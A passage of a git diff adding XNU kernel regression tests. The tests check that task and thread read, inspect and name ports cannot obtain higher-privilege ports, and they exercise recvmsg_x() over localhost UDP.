@@ -4,6 +4,8 @@ #include #include +#include "test_utils.h" + /* * Any change to this structure must be reflected in iBoot / MacEFI / PanicDump / XNU Tests and vice versa. */ @@ -39,21 +41,6 @@ check_for_substrings(const char* string, size_t len) return res; } -static boolean_t -is_development_kernel(void) -{ - int ret; - int dev = 0; - size_t dev_size = sizeof(dev); - - ret = sysctlbyname("kern.development", &dev, &dev_size, NULL, 0); - if (ret != 0) { - return FALSE; - } - - return dev != 0; -} - /* * Valid cases: * 1. Development & Debug iBoot/macEFI provides a preoslog buffer. diff --git a/tests/quiesce_counter.c b/tests/quiesce_counter.c index d864d8531..18f54d76d 100644 --- a/tests/quiesce_counter.c +++ b/tests/quiesce_counter.c @@ -68,9 +68,9 @@ T_DECL(test_quiescent_counter, "Validate that _COMM_PAGE_CPU_QUIESCENT_COUNTER i T_ASSERT_GT(cpu_checkin_min_interval, 0, "kern.cpu_checkin_interval should be > 0"); - uint64_t* commpage_addr = (uint64_t *)(uintptr_t)_COMM_PAGE_CPU_QUIESCENT_COUNTER; + COMM_PAGE_SLOT_TYPE(uint64_t) commpage_addr = COMM_PAGE_SLOT(uint64_t, CPU_QUIESCENT_COUNTER); - T_LOG("address of _COMM_PAGE_CPU_QUIESCENT_COUNTER is %p", (void*) commpage_addr); + T_LOG("address of _COMM_PAGE_CPU_QUIESCENT_COUNTER is %p", commpage_addr); uint64_t counter = *commpage_addr; uint64_t last_counter = counter; diff --git a/tests/read_inspect.c b/tests/read_inspect.c new file mode 100644 index 000000000..82b375125 --- /dev/null +++ b/tests/read_inspect.c @@ -0,0 +1,630 @@ +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IKOT_THREAD_CONTROL 1 +#define IKOT_THREAD_READ 47 +#define IKOT_THREAD_INSPECT 46 + +#define IKOT_TASK_CONTROL 2 +#define IKOT_TASK_READ 45 +#define IKOT_TASK_INSPECT 44 +#define IKOT_TASK_NAME 20 + + +/* + * This test verifies various security properties for task and thread + * read/inspect interfaces. Specifically, it checks and makes sure: + * + * 1. Task/thread can't get higher priv'ed ports from lower ones through + * {task, thread}_get_special_port() + * 2. Correct level of thread ports are returned from task_threads() with + * a given task port flavor + * 3. Correct level of task ports are returned from processor_set_tasks() + * 4. MIG intrans conversion and enforcement for task/thread port does not break. + * 5. task_{, read, inspect, name}_for_pid() works for self and other process + * 6. The new mach_vm_remap_new interface behaves correctly + */ + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(TRUE)); + +static void +RESULT_CHECK( + kern_return_t kr, + unsigned int flavor, /* task_flavor_t or thread_flavor_t */ + unsigned int required, /* task_flavor_t or thread_flavor_t */ + char *f_name) +{ + if (flavor <= required) { + T_EXPECT_EQ(kr, KERN_SUCCESS, "%s should succeed with task/thread flavor %d, kr: 0x%x", f_name, flavor, kr); + } else { + T_EXPECT_NE(kr, KERN_SUCCESS, "%s should fail with task/thread flavor %d, kr: 0x%x", f_name, flavor, kr); + } +} + +static void +test_task_get_special_port( + task_t tport, + task_flavor_t flavor) +{ + kern_return_t kr; + mach_port_t special_port = MACH_PORT_NULL; + mach_port_t tfp_port = MACH_PORT_NULL; + + T_LOG("Testing task_get_special_port() with task flavor %d", flavor); + /* gettable with at least control port */ + kr = task_get_special_port(tport, TASK_KERNEL_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_KERNEL_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + kr = task_get_special_port(tport, TASK_BOOTSTRAP_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_BOOTSTRAP_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + kr = task_get_special_port(tport, TASK_HOST_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_HOST_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + /* gettable with at least read port */ + kr = task_get_special_port(tport, TASK_READ_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "task_get_special_port(TASK_READ_PORT)"); + if (KERN_SUCCESS == kr) { + kr = task_read_for_pid(mach_task_self(), getpid(), &tfp_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_read_for_pid()"); + T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_read_for_pid() should match TASK_READ_PORT"); + mach_port_deallocate(mach_task_self(), tfp_port); + } + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + /* gettable with at least inspect port */ + kr = task_get_special_port(tport, TASK_INSPECT_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_special_port(TASK_INSPECT_PORT)"); + if (KERN_SUCCESS == kr) { + kr = task_inspect_for_pid(mach_task_self(), getpid(), &tfp_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_inspect_for_pid()"); + T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_inspect_for_pid() should match TASK_INSPECT_PORT"); + mach_port_deallocate(mach_task_self(), tfp_port); + } + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + /* gettable with at least name port */ + kr = task_get_special_port(tport, TASK_NAME_PORT, &special_port); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_special_port(TASK_NAME_PORT)"); + if (KERN_SUCCESS == kr) { + kr = task_name_for_pid(mach_task_self(), getpid(), &tfp_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_name_for_pid()"); + T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_name_for_pid() should match TASK_NAME_PORT"); + mach_port_deallocate(mach_task_self(), tfp_port); + } + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; +} + +static void +test_thread_get_special_port( + thread_t tport, + thread_flavor_t flavor) +{ + kern_return_t kr; + mach_port_t special_port = MACH_PORT_NULL; + + T_LOG("Testing thread_get_special_port() with thread flavor %d", flavor); + /* gettable with at least control port */ + kr = thread_get_special_port(tport, THREAD_KERNEL_PORT, &special_port); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_CONTROL, "thread_get_special_port(THREAD_KERNEL_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + /* gettable with at least read port */ + kr = thread_get_special_port(tport, THREAD_READ_PORT, &special_port); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_READ, "thread_get_special_port(THREAD_READ_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; + + /* gettable with at least inspect port */ + kr = thread_get_special_port(tport, THREAD_INSPECT_PORT, &special_port); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_INSPECT, "thread_get_special_port(THREAD_INSPECT_PORT)"); + mach_port_deallocate(mach_task_self(), special_port); + special_port = MACH_PORT_NULL; +} + +static void +test_task_threads( + task_t tport, + task_flavor_t flavor) +{ + kern_return_t kr; + thread_array_t threadList; + mach_msg_type_number_t threadCount = 0; + + unsigned int kotype; + unsigned int kaddr; + + T_LOG("Testing task_threads() with task flavor %d", flavor); + + kr = task_threads(tport, &threadList, &threadCount); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_threads"); + + if (kr) { + T_LOG("task_threads failed, skipping test_task_threads()"); + return; + } + + T_QUIET; T_ASSERT_GE(threadCount, 1, "threadCount should be at least 1"); + + /* + * TASK_FLAVOR_CONTROL -> THREAD_FLAVOR_CONTROL + * TASK_FLAVOR_READ -> THREAD_FLAVOR_READ + * TASK_FLAVOR_INSPECT -> THREAD_FLAVOR_INSPECT + * TASK_FLAOVR_NAME -> KERN_FAILURE + */ + for (size_t i = 0; i < threadCount; i++) { + kr = mach_port_kernel_object(mach_task_self(), threadList[i], &kotype, &kaddr); + if (kr == KERN_INVALID_RIGHT) { + /* thread port is inactive */ + T_LOG("thread port name 0x%x is inactive", threadList[i]); + continue; + } else if (kr) { + T_FAIL("mach_port_kernel_object() failed with kr: 0x%x", kr); + } + switch (flavor) { + case TASK_FLAVOR_CONTROL: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_CONTROL, "Task control port should yield thread control port"); + break; + case TASK_FLAVOR_READ: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_READ, "Task read port should yield thread read port"); + break; + case TASK_FLAVOR_INSPECT: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_INSPECT, "Task inspect port should yield thread inspect port"); + break; + default: + T_FAIL("task_threads() returned thread ports with task name port??"); + break; + } + } + + for (size_t i = 0; i < threadCount; i++) { + mach_port_deallocate(mach_task_self(), threadList[i]); + } +} + +static void +test_processor_set_tasks( + task_flavor_t flavor) +{ + kern_return_t kr; + processor_set_name_array_t psets; + processor_set_t pset_priv; + task_array_t taskList; + mach_msg_type_number_t pcnt = 0, tcnt = 0; + mach_port_t host = mach_host_self(); + + unsigned int kotype; + unsigned int kaddr; + + T_LOG("Testing processor_set_tasks() with task flavor %d", flavor); + + kr = host_processor_sets(host, &psets, &pcnt); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_sets"); + T_QUIET; T_ASSERT_GE(pcnt, 1, "should have at least 1 processor set"); + + kr = host_processor_set_priv(host, psets[0], &pset_priv); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_set_priv"); + for (size_t i = 0; i < pcnt; i++) { + mach_port_deallocate(mach_task_self(), psets[i]); + } + mach_port_deallocate(mach_task_self(), host); + + kr = processor_set_tasks_with_flavor(pset_priv, flavor, &taskList, &tcnt); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "processor_set_tasks_with_flavor"); + T_QUIET; T_ASSERT_GE(tcnt, 1, "should have at least 1 task"); + mach_port_deallocate(mach_task_self(), pset_priv); + + for (size_t i = 0; i < tcnt; i++) { + kr = mach_port_kernel_object(mach_task_self(), taskList[i], &kotype, &kaddr); + if (kr == KERN_INVALID_RIGHT) { + /* task port is inactive */ + T_LOG("task port name 0x%x is inactive", taskList[i]); + continue; + } else if (kr) { + T_FAIL("mach_port_kernel_object() failed with kr: 0x%x", kr); + } + switch (flavor) { + case TASK_FLAVOR_CONTROL: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_CONTROL, "TASK_FLAVOR_CONTROL should yield control ports"); + break; + case TASK_FLAVOR_READ: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_READ, "TASK_FLAVOR_READ should yield read ports"); + break; + case TASK_FLAVOR_INSPECT: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_INSPECT, "TASK_FLAVOR_INSPECT should yield inspect ports"); + break; + case TASK_FLAVOR_NAME: + T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_NAME, "TASK_FLAVOR_NAME should yield name ports"); + break; + default: + T_FAIL("strange flavor"); + break; + } + } + + for (size_t i = 0; i < tcnt; i++) { + mach_port_deallocate(mach_task_self(), taskList[i]); + } +} + +static void +test_task_port_mig_intrans( + task_t tport, + task_flavor_t flavor) +{ + kern_return_t kr; + + T_LOG("Testing various MIG/manual intrans task interfaces with task flavor %d", flavor); + + { + /* 1. Test some control port interfaces */ + int data = 0x41; + int new_value = 0x42; + kr = mach_vm_write(tport, + (mach_vm_address_t)&data, + (vm_offset_t)&new_value, + (mach_msg_type_number_t)sizeof(int)); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "mach_vm_write"); + + /* mach_vm_remap_new with max_protection VM_PROT_WRITE | VM_PROT_READ */ + int *localAddress = 0; + mach_vm_address_t localMachVMAddress = 0; + vm_prot_t cur_protection = VM_PROT_WRITE | VM_PROT_READ; + vm_prot_t max_protection = VM_PROT_WRITE | VM_PROT_READ; + /* rdar://67706101 (mach_vm_remap flag that allows restricting protection of remapped region) */ + kr = mach_vm_remap_new(mach_task_self(), + &localMachVMAddress, + sizeof(int), + 0, + VM_FLAGS_ANYWHERE, + tport, /* remote task, use self task port */ + (mach_vm_address_t)&data, + false, + &cur_protection, + &max_protection, + VM_INHERIT_NONE); + localAddress = (int *)(uintptr_t)localMachVMAddress; + + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "mach_vm_remap_new - VM_PROT_WRITE"); + if (KERN_SUCCESS == kr) { + T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ | VM_PROT_WRITE, NULL); + T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ | VM_PROT_WRITE, NULL); + T_QUIET; T_EXPECT_EQ(*localAddress, data, NULL); /* read */ + *localAddress = 0; /* write */ + } + + exception_mask_t masks[EXC_TYPES_COUNT] = {}; + mach_msg_type_number_t nmasks = 0; + exception_port_t ports[EXC_TYPES_COUNT] = {}; + exception_behavior_t behaviors[EXC_TYPES_COUNT] = {}; + thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {}; + kr = task_get_exception_ports(tport, EXC_MASK_ALL, + masks, &nmasks, ports, behaviors, flavors); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_exception_ports"); + for (size_t i = 0; i < EXC_TYPES_COUNT; i++) { + mach_port_deallocate(mach_task_self(), ports[i]); + } + } + + { + /* 2. Test some read port interfaces */ + vm_offset_t read_value = 0; + mach_msg_type_number_t read_cnt = 0; + int data = 0x41; + kr = mach_vm_read(tport, + (mach_vm_address_t)&data, + (mach_msg_type_number_t)sizeof(int), + &read_value, + &read_cnt); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_read"); + + /* mach_vm_remap_new with max_protection VM_PROT_READ */ + int *localAddress = 0; + mach_vm_address_t localMachVMAddress = 0; + vm_prot_t cur_protection = VM_PROT_READ; + vm_prot_t max_protection = VM_PROT_READ; + /* rdar://67706101 (mach_vm_remap flag that allows restricting protection of remapped region) */ + kr = mach_vm_remap_new(mach_task_self(), + &localMachVMAddress, + sizeof(int), + 0, + VM_FLAGS_ANYWHERE, + tport, /* remote task, use self task port */ + (mach_vm_address_t)&data, + false, + &cur_protection, + &max_protection, + VM_INHERIT_NONE); + localAddress = (int *)(uintptr_t)localMachVMAddress; + + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_remap_new - VM_PROT_READ"); + if (KERN_SUCCESS == kr) { + T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ, NULL); + T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ, NULL); + T_QUIET; T_EXPECT_EQ(*localAddress, data, NULL); /* read */ + } + + /* mach_vm_remap_new with copy == TRUE */ + int data2 = 0x42; + localAddress = 0; + localMachVMAddress = 0; + cur_protection = VM_PROT_WRITE | VM_PROT_READ; + max_protection = VM_PROT_WRITE | VM_PROT_READ; + + kr = mach_vm_remap_new(mach_task_self(), + &localMachVMAddress, + sizeof(int), + 0, + VM_FLAGS_ANYWHERE, + tport, /* remote task, use self task port */ + (mach_vm_address_t)&data2, + true, + &cur_protection, + &max_protection, + VM_INHERIT_NONE); + localAddress = (int *)(uintptr_t)localMachVMAddress; + + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_remap_new - copy==TRUE"); + if (KERN_SUCCESS == kr) { + T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ | VM_PROT_WRITE, NULL); + T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ | VM_PROT_WRITE, NULL); + /* Following is causing bus error tracked by rdar://71616700 (Unexpected BUS ERROR in mach_vm_remap_new()) */ + // T_QUIET; T_EXPECT_EQ(*localAddress, data2, NULL); /* read */ + // *localAddress = 0; /* write */ + } + + /* */ + mach_port_t voucher = MACH_PORT_NULL; + kr = task_get_mach_voucher(tport, 0, &voucher); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "task_get_mach_voucher"); + mach_port_deallocate(mach_task_self(), voucher); + + /* */ + ipc_info_space_t space_info; + ipc_info_name_array_t table; + mach_msg_type_number_t tableCount; + ipc_info_tree_name_array_t tree; /* unused */ + mach_msg_type_number_t treeCount; /* unused */ + kr = mach_port_space_info(tport, &space_info, &table, &tableCount, &tree, &treeCount); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_port_space_info"); + } + + { + /* 3. Test some inspect port interfaces */ + task_exc_guard_behavior_t exc_behavior; + kr = task_get_exc_guard_behavior(tport, &exc_behavior); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_exc_guard_behavior"); + } + + { + /* 4. Test some name port interfaces */ + struct task_basic_info info; + mach_msg_type_number_t size = sizeof(info); + kr = task_info(tport, + TASK_BASIC_INFO, + (task_info_t)&info, + &size); + RESULT_CHECK(kr, flavor, TASK_FLAVOR_NAME, "task_info"); + } +} + +static void +test_thread_port_mig_intrans( + thread_t tport, + thread_flavor_t flavor) +{ + kern_return_t kr; + + T_LOG("Testing various MIG/manual intrans thread interfaces with thread flavor %d", flavor); + + { + /* 1. Test some control port interfaces */ + exception_mask_t masks[EXC_TYPES_COUNT] = {}; + mach_msg_type_number_t nmasks = 0; + exception_port_t ports[EXC_TYPES_COUNT] = {}; + exception_behavior_t behaviors[EXC_TYPES_COUNT] = {};; + thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {};; + kr = thread_get_exception_ports(tport, EXC_MASK_ALL, + masks, &nmasks, ports, behaviors, flavors); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_CONTROL, "thread_get_exception_ports"); + for (size_t i = 0; i < EXC_TYPES_COUNT; i++) { + mach_port_deallocate(mach_task_self(), ports[i]); + } + } + + { + /* 2. Test some read port interfaces */ + mach_voucher_t voucher = MACH_PORT_NULL; + kr = thread_get_mach_voucher(tport, 0, &voucher); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_READ, "thread_get_mach_voucher"); + mach_port_deallocate(mach_task_self(), voucher); + } + + { + /* 3. Test some inspect port interfaces */ + processor_set_name_t name = MACH_PORT_NULL; + kr = thread_get_assignment(tport, &name); + RESULT_CHECK(kr, flavor, THREAD_FLAVOR_INSPECT, "thread_get_assignment"); + mach_port_deallocate(mach_task_self(), name); + } +} + +static void +test_get_child_task_port(void) +{ + pid_t child_pid; + kern_return_t kr; + mach_port_name_t tr, ti, tp, tn; + + child_pid = fork(); + + T_LOG("Testing get child task ports"); + + if (child_pid < 0) { + T_FAIL("fork failed in test_get_child_port."); + } + + if (child_pid == 0) { + /* hang the child */ + while (1) { + sleep(10); + } + } + + kr = task_for_pid(mach_task_self(), child_pid, &tp); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_for_pid for child %u", child_pid); + + kr = task_read_for_pid(mach_task_self(), child_pid, &tr); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_read_for_pid for child %u", child_pid); + + kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_inspect_for_pid for child %u", child_pid); + + kr = task_name_for_pid(mach_task_self(), child_pid, &tn); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_name_for_pid for child %u", child_pid); + + mach_port_deallocate(mach_task_self(), tp); + mach_port_deallocate(mach_task_self(), tr); + mach_port_deallocate(mach_task_self(), ti); + mach_port_deallocate(mach_task_self(), tn); + + kill(child_pid, SIGKILL); + int status; + wait(&status); +} + +T_DECL(read_inspect, "Test critical read and inspect port interfaces") +{ + mach_port_t control_port, movable_port, read_port, inspect_port, name_port; + mach_port_t th_control_port, th_movable_port, th_read_port, th_inspect_port; +#define TASK_PORT_COUNT 5 +#define THREAD_PORT_COUNT 4 + mach_port_t task_ports[TASK_PORT_COUNT]; + task_flavor_t task_flavors[TASK_PORT_COUNT]; + mach_port_t thread_ports[THREAD_PORT_COUNT]; + thread_flavor_t thread_flavors[THREAD_PORT_COUNT]; + kern_return_t kr; + + /* first, try getting all flavors of task port for self */ + kr = task_for_pid(mach_task_self(), getpid(), &control_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_for_pid()"); + task_ports[0] = control_port; + task_flavors[0] = TASK_FLAVOR_CONTROL; + + kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &movable_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port(..TASK_KERNEL_PORT..)"); + task_ports[1] = movable_port; + task_flavors[1] = TASK_FLAVOR_CONTROL; + + kr = task_read_for_pid(mach_task_self(), getpid(), &read_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_read_for_pid()"); + task_ports[2] = read_port; + task_flavors[2] = TASK_FLAVOR_READ; + + kr = task_inspect_for_pid(mach_task_self(), getpid(), &inspect_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_inspect_for_pid()"); + task_ports[3] = inspect_port; + task_flavors[3] = TASK_FLAVOR_INSPECT; + + kr = task_name_for_pid(mach_task_self(), getpid(), &name_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_name_for_pid()"); + task_ports[4] = name_port; + task_flavors[4] = TASK_FLAVOR_NAME; + + + for (size_t i = 0; i < TASK_PORT_COUNT; i++) { + /* + * 1. Make sure can't get higher priv'ed ports from lower ones through + * task_get_special_port() + */ + test_task_get_special_port(task_ports[i], task_flavors[i]); + + /* + * 2. Make sure correct level of thread ports are returned from task_threads + */ + test_task_threads(task_ports[i], task_flavors[i]); + + /* + * 3. Make sure correct level of task ports are returned from processor_set_tasks + */ + if (i >= 1) { + test_processor_set_tasks(task_flavors[i]); + } + + /* + * 4. Make sure our MIG intrans enforcement for tasks does not break. + */ + test_task_port_mig_intrans(task_ports[i], task_flavors[i]); + } + + + for (size_t i = 0; i < TASK_PORT_COUNT; i++) { + mach_port_deallocate(mach_task_self(), task_ports[i]); + } + + /* 4. Try spawning a child an get its task ports */ + test_get_child_task_port(); + + /* Now, test thread read/inspect ports */ + th_control_port = mach_thread_self(); + thread_ports[0] = th_control_port; + thread_flavors[0] = THREAD_FLAVOR_CONTROL; + + kr = thread_get_special_port(th_control_port, THREAD_KERNEL_PORT, &th_movable_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_KERNEL_PORT..)"); + thread_ports[1] = th_movable_port; + thread_flavors[1] = THREAD_FLAVOR_CONTROL; + + kr = thread_get_special_port(th_control_port, THREAD_READ_PORT, &th_read_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_READ_PORT..)"); + thread_ports[2] = th_read_port; + thread_flavors[2] = THREAD_FLAVOR_READ; + + kr = thread_get_special_port(th_control_port, THREAD_INSPECT_PORT, &th_inspect_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_INSPECT_PORT..)"); + thread_ports[3] = th_inspect_port; + thread_flavors[3] = THREAD_FLAVOR_INSPECT; + + + for (size_t i = 0; i < THREAD_PORT_COUNT; i++) { + /* + * 1. Make sure can't get higher priv'ed ports from lower ones through + * thread_get_special_port() + */ + test_thread_get_special_port(thread_ports[i], thread_flavors[i]); + + /* + * 2. Make sure our MIG intrans enforcement for threads does not break. + */ + test_thread_port_mig_intrans(thread_ports[i], thread_flavors[i]); + } + + for (size_t i = 0; i < THREAD_PORT_COUNT; i++) { + mach_port_deallocate(mach_task_self(), thread_ports[i]); + } +} diff --git a/tests/recvmsg_x_test.c b/tests/recvmsg_x_test.c new file mode 100644 index 000000000..fb86f46cd --- /dev/null +++ b/tests/recvmsg_x_test.c @@ -0,0 +1,216 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +/* -*- compile-command: "xcrun --sdk iphoneos.internal make recvmsg_x_test" -*- */ + + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#define NMSGS 5 +#define BUFFERLEN 1000 + +T_GLOBAL_META(T_META_NAMESPACE("xnu.net")); + +static void +sendPackets(int s, struct sockaddr *dst, unsigned int numMsg, size_t bufferLen) +{ + ssize_t count = 0; + struct msghdr msg = {}; + struct iovec vec = {}; + char *bytes = calloc(1, bufferLen); + if (bytes == NULL) { + err(EX_OSERR, "calloc()"); + } + + vec.iov_base = bytes; + vec.iov_len = bufferLen; + + msg.msg_name = (void *)dst; + msg.msg_namelen = dst->sa_len; + msg.msg_iov = &vec; + msg.msg_iovlen = 1; + msg.msg_flags = 0; + + for (unsigned int i = 0; i < numMsg; i++) { + ssize_t n; + T_QUIET; T_EXPECT_POSIX_SUCCESS(n = sendmsg(s, &msg, 0), "sendmsg()"); + T_LOG("Sent %ld bytes\n", n); + count += 1; + } + + // Wait a bit to make sure the packets reach the receiver + usleep(100000); + + T_LOG("Sent %ld packet\n", count); + + free(bytes); +} + +static void +recvPackets_x(int s, unsigned int numMsg, size_t buflen, socklen_t cmsgLen) +{ + struct msghdr_x *msgList; + struct sockaddr_in *srcAddrs; + struct iovec *vec; + char *buffers; + char *cmsgBuf; + + T_QUIET; T_ASSERT_NOTNULL(msgList = calloc(numMsg, sizeof(struct msghdr_x)), "msgList calloc()"); + T_QUIET; T_ASSERT_NOTNULL(srcAddrs = calloc(numMsg, sizeof(struct sockaddr_in)), "srcAddrs calloc()"); + T_QUIET; T_ASSERT_NOTNULL(vec = calloc(numMsg, sizeof(struct iovec)), "vec calloc()"); + T_QUIET; T_ASSERT_NOTNULL(buffers = calloc(numMsg, buflen), "buffers calloc()"); + T_QUIET; T_ASSERT_NOTNULL(cmsgBuf = calloc(numMsg, ALIGN(cmsgLen)), "cmsgBuf calloc()"); + + u_int count = 0; + while (true) { + /* + * Wrap around when we've exhausted the list + */ + if ((count % numMsg) == 0) { + for (unsigned int i = 0; i < numMsg; i++) { + struct msghdr_x *msg = &msgList[i]; + msg->msg_name = &srcAddrs[i]; + msg->msg_namelen = sizeof(srcAddrs[i]); + vec[i].iov_base = buffers + (i * buflen); + vec[i].iov_len = buflen; + msg->msg_iov = &vec[i]; + msg->msg_iovlen = 1; + msg->msg_control = cmsgBuf + (i * ALIGN(cmsgLen)); + msg->msg_controllen = cmsgLen; + msg->msg_flags = 0; + + T_QUIET; T_EXPECT_TRUE((uintptr_t)msg->msg_control % sizeof(uint32_t) == 0, NULL); + } + } + + ssize_t n = recvmsg_x(s, msgList + (count % numMsg), numMsg - (count % numMsg), 0); + if (n < 0) { + if (errno == EINTR) { + T_LOG("recvmsg_x(): %s", strerror(errno)); + continue; + } + if (errno == EWOULDBLOCK) { + T_LOG("recvmsg_x(): %s", strerror(errno)); + break; + } + T_FAIL("recvmsg_x() failed: %s", strerror(errno)); + } + T_LOG("recvmsg_x returned %ld packets\n", n); + + for (unsigned int i = count; i < count + (u_int)n; i++) { + struct msghdr_x *msg = &msgList[i % numMsg]; + + T_LOG("Received packet #%d %lu bytes with recvmsg_x(), msg_namelen = %u, msg_controllen = %d -> %d, msg_flags = 0x%x\n", + i + 1, msg->msg_datalen, msg->msg_namelen, cmsgLen, msg->msg_controllen, msg->msg_flags); + + struct cmsghdr *cmsg; + + for (cmsg = CMSG_FIRSTHDR(msg); cmsg; cmsg = CMSG_NXTHDR(msg, cmsg)) { + T_QUIET; T_EXPECT_TRUE((uintptr_t)cmsg % sizeof(uint32_t) == 0, NULL); + + T_LOG("level = %d, type = %d, length = %d\n", cmsg->cmsg_level, cmsg->cmsg_type, cmsg->cmsg_len); + } + } + + count += (u_int)n; + } + + free(msgList); + free(srcAddrs); + free(vec); + free(buffers); + free(cmsgBuf); +} + +T_DECL(recvmsg_x_test, "exercise revcmsg_x() with various parameter") +{ + struct sockaddr_in addr = { + .sin_len = sizeof(addr), + .sin_family = AF_INET, + .sin_addr.s_addr = htonl(0x7f000001), + .sin_port = 0 + }; + + int recvSocket; + T_QUIET; T_EXPECT_POSIX_SUCCESS(recvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), "socket()"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(bind(recvSocket, (const struct sockaddr *)&addr, sizeof(addr)), "bind()"); + + socklen_t addrLen = sizeof(addr); + T_QUIET; T_EXPECT_POSIX_SUCCESS(getsockname(recvSocket, (struct sockaddr *)&addr, &addrLen), "getsockname()"); + + int one = 1; + T_QUIET; T_EXPECT_POSIX_SUCCESS(setsockopt(recvSocket, IPPROTO_IP, IP_RECVPKTINFO, (void *)&one, sizeof(one)), "setsockopt(IP_RECVPKTINFO)"); + + int flags = fcntl(recvSocket, F_GETFL, 0); + T_QUIET; 